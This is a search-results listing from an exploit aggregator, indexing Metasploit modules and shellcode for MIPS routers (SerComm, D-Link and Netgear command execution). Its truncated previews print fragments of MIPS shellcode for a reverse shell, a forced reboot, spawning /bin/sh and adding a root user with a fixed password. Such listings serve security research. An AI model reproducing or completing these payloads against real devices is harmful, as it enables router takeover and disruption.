Lucene search
+L

958 matches found

Metasploit
Metasploit
added 2014/01/09 3:21 a.m.20 views

SerComm Device Remote Code Execution

This module will cause remote code execution on several SerComm devices. These devices typically include routers from NetGear and Linksys. This module was tested successfully against several NetGear, Honeywell and Cisco devices. This module requires Metasploit: https://metasploit.com/download...

1.1AI score
SaveExploits0
Kitploit
Kitploit
added 2013/12/31 5:4 p.m.25 views

[Capstone] Ultimate Disassembly Framework

Capstone is a lightweight multi-platform, multi-architecture disassembly framework. Our target is to make Capstone the ultimate disassembly engine for binary analysis and reversing in the security community. Features Support hardware architectures: ARM, ARM64 aka ARMv8, Mips & X86 more details...

7.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2013/11/04 12:0 a.m.33 views

MIPS Little Endian - Reverse Shell Shellcode Linux

MIPS Little Endian - Reverse Shell Shellcode Linux. Shellcode exploit for hardware platform MIPS Little Endian Reverse Shell ASM File and Assembled Shellcode Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators Blog: http://infosec42.blogspot.com Company Website:...

7.4AI score
SaveExploits0
Metasploit
Metasploit
added 2013/11/02 3:22 p.m.22 views

Byte XORi Encoder

Mips Web server exploit friendly xor encoder. This encoder has been found useful on situations where '&' 0x26 is a badchar. Since 0x26 is the xor's opcode on MIPS architectures, this one is based on the xori instruction. This module requires Metasploit: https://metasploit.com/download Current...

7.3AI score
SaveExploits0
Metasploit
Metasploit
added 2013/11/02 3:10 p.m.16 views

Byte XORi Encoder

Mips Web server exploit friendly xor encoder. This encoder has been found useful on situations where '&' 0x26 is a badchar. Since 0x26 is the xor's opcode on MIPS architectures, this one is based on the xori instruction. This module requires Metasploit: https://metasploit.com/download Current...

7.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2013/07/27 12:0 a.m.59 views

MIPS Little Endian Shellcode

MIPS Little Endian Shellcode. CVE-2013-4659. Shellcode exploit for mips platform Disassembled MIPS Little Endian Shellcode Shellcode was designed for ACSD exploit on the ASUS RT-AC66U SOHO router. CVE: CVE-2013-4659 Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators Blog...

10CVSS9.7AI score0.13918EPSS
SaveExploits8
Exploit DB
Exploit DB
added 2013/07/23 12:0 a.m.38 views

D-Link Devices - UPnP SOAP Command Execution (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'D-Link Devices UPnP SOAP Command...

5.3AI score
SaveExploits0
Metasploit
Metasploit
added 2013/07/14 1:42 p.m.202 views

D-Link Devices UPnP SOAP Command Execution

Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on DIR-865 and DIR-645 devices. This module requires Metasploit:...

9.8CVSS0.5AI score0.99975EPSS
SaveExploits6
Packet Storm
Packet Storm
added 2013/05/20 12:0 a.m.41 views

D-Link DIR615h OS Command Injection

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'D-Link DIR615h OS Command Injection',...

0.1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2013/04/20 12:0 a.m.35 views

Netgear DGN2200B pppoe.cgi Remote Command Execution

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'Netgear DGN2200B pppoe.cgi Remote...

0.3AI score
SaveExploits0
rapid7community
rapid7community
added 2013/04/05 3:40 p.m.19 views

Compromising Embedded Linux Routers with Metasploit

Normally we don't get a lot of contributions regarding embedded devices. Even when they are an interesting target from the pentesting point of view, and is usual to find them out of DMZ zones on corporate networks. Maybe it's because access to these devices or the software running in top of them ...

8.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2011/12/10 12:0 a.m.29 views

Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes

Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Shellcode exploit for linuxmips platform / Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x20\x27" // nor...

0.2AI score
SaveExploits0
0day.today
0day.today
added 2011/12/10 12:0 a.m.32 views

linux/mips - reboot() - 32 bytes

/ Title: Linux/MIPS - reboot - 32 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x3c\x06\x43\x21" // lui a2,0x4321 "\x34\xc6\xfe\xdc" // ori a2,a2,0xfedc "\x3c\x05\x28\x12" // lui a1,0x2812 "\x34\xa5\x19\x69" // ori a1,a1,0x1969 "\x3c\x04\xfe\xe1" // lui a0,0xfee1...

7.4AI score
SaveExploits0
0day.today
0day.today
added 2011/12/10 12:0 a.m.26 views

linux/mips - connect back shellcode (port 0x7a69) - 168 bytes

/ Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x20\x27" // nor a0,t7,zero "\x01\xe0\x28\x27" // nor a1,t7,zero "\x28\x06\xff\xff" // slti a2,zero,-1 "\x24\x02\x10\x57" //...

0.2AI score
SaveExploits0
Exploit DB
Exploit DB
added 2011/12/10 12:0 a.m.29 views

Linux/MIPS - reboot - 32 bytes

Linux/MIPS - reboot - 32 bytes. Shellcode exploit for linuxmips platform / Title: Linux/MIPS - reboot - 32 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x3c\x06\x43\x21" // lui a2,0x4321 "\x34\xc6\xfe\xdc" // ori a2,a2,0xfedc "\x3c\x05\x28\x12" // lui a1,0x2812...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2011/11/27 12:0 a.m.33 views

Linux/MIPS - add userUID 0 with password - 164 bytes

Linux/MIPS - add userUID 0 with password - 164 bytes. Shellcode exploit for linux platform / Title: Linux/MIPS -add userUID 0 with password - 164 bytes Date: 2011-11-24 Author: rigan - imrigan at gmail.com Note: Username - rOOt Password - pwn3d / include char sc = "\x24\x09\x73\x50" // li t1,2952...

SaveExploits0
0day.today
0day.today
added 2011/11/27 12:0 a.m.25 views

linux/mips - execve /bin/sh - 48 bytes

/ Title: Linux/MIPS - execve /bin/sh - 48 bytes Date: 2011-11-24 Author: rigan - imrigan at gmail.com .text .global start start: slti $a2, $zero, -1 li $t7, 0x2f2f6269 sw $t7, -12$sp li $t6, 0x6e2f7368 sw $t6, -8$sp sw $zero, -4$sp la $a0, -12$sp slti $a1, $zero, -1 li $v0, 4011 syscall 0x40404 /...

7.4AI score
SaveExploits0
0day.today
0day.today
added 2011/11/27 12:0 a.m.29 views

linux/mips - add user(UID 0) with password - 164 bytes

/ Title: Linux/MIPS -add userUID 0 with password - 164 bytes Date: 2011-11-24 Author: rigan - imrigan at gmail.com Note: Username - rOOt Password - pwn3d / include char sc = "\x24\x09\x73\x50" // li t1,29520 "\x05\x30\xff\xff" // bltzal t1,400094 "\x24\x09\x73\x50" // li t1,29520 nop /...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2011/11/27 12:0 a.m.34 views

Linux/MIPS - execve /bin/sh - 48 bytes

Linux/MIPS - execve /bin/sh - 48 bytes. Shellcode exploit for linux platform / Title: Linux/MIPS - execve /bin/sh - 48 bytes Date: 2011-11-24 Author: rigan - imrigan at gmail.com .text .global start start: slti $a2, $zero, -1 li $t7, 0x2f2f6269 sw $t7, -12$sp li $t6, 0x6e2f7368 sw $t6, -8$sp sw...

7.4AI score
SaveExploits0
0day.today
0day.today
added 2011/11/24 12:0 a.m.23 views

linux/mips XOR Shellcode Encoder (60 Bytes)

include include include include include include include define DEBUG 0 / entropy at phiral.net mips linux shellcode xor encoder \xAB\xCD is overwritten with jmp back offset \x00\x00 is overwritten with the byte its xored with 0. gcc encoder.c -o encoder 1. perl -e 'print "\xsh\xel\xlc\xod\xe0";'...

0.3AI score
SaveExploits0
Rows per page
Query Builder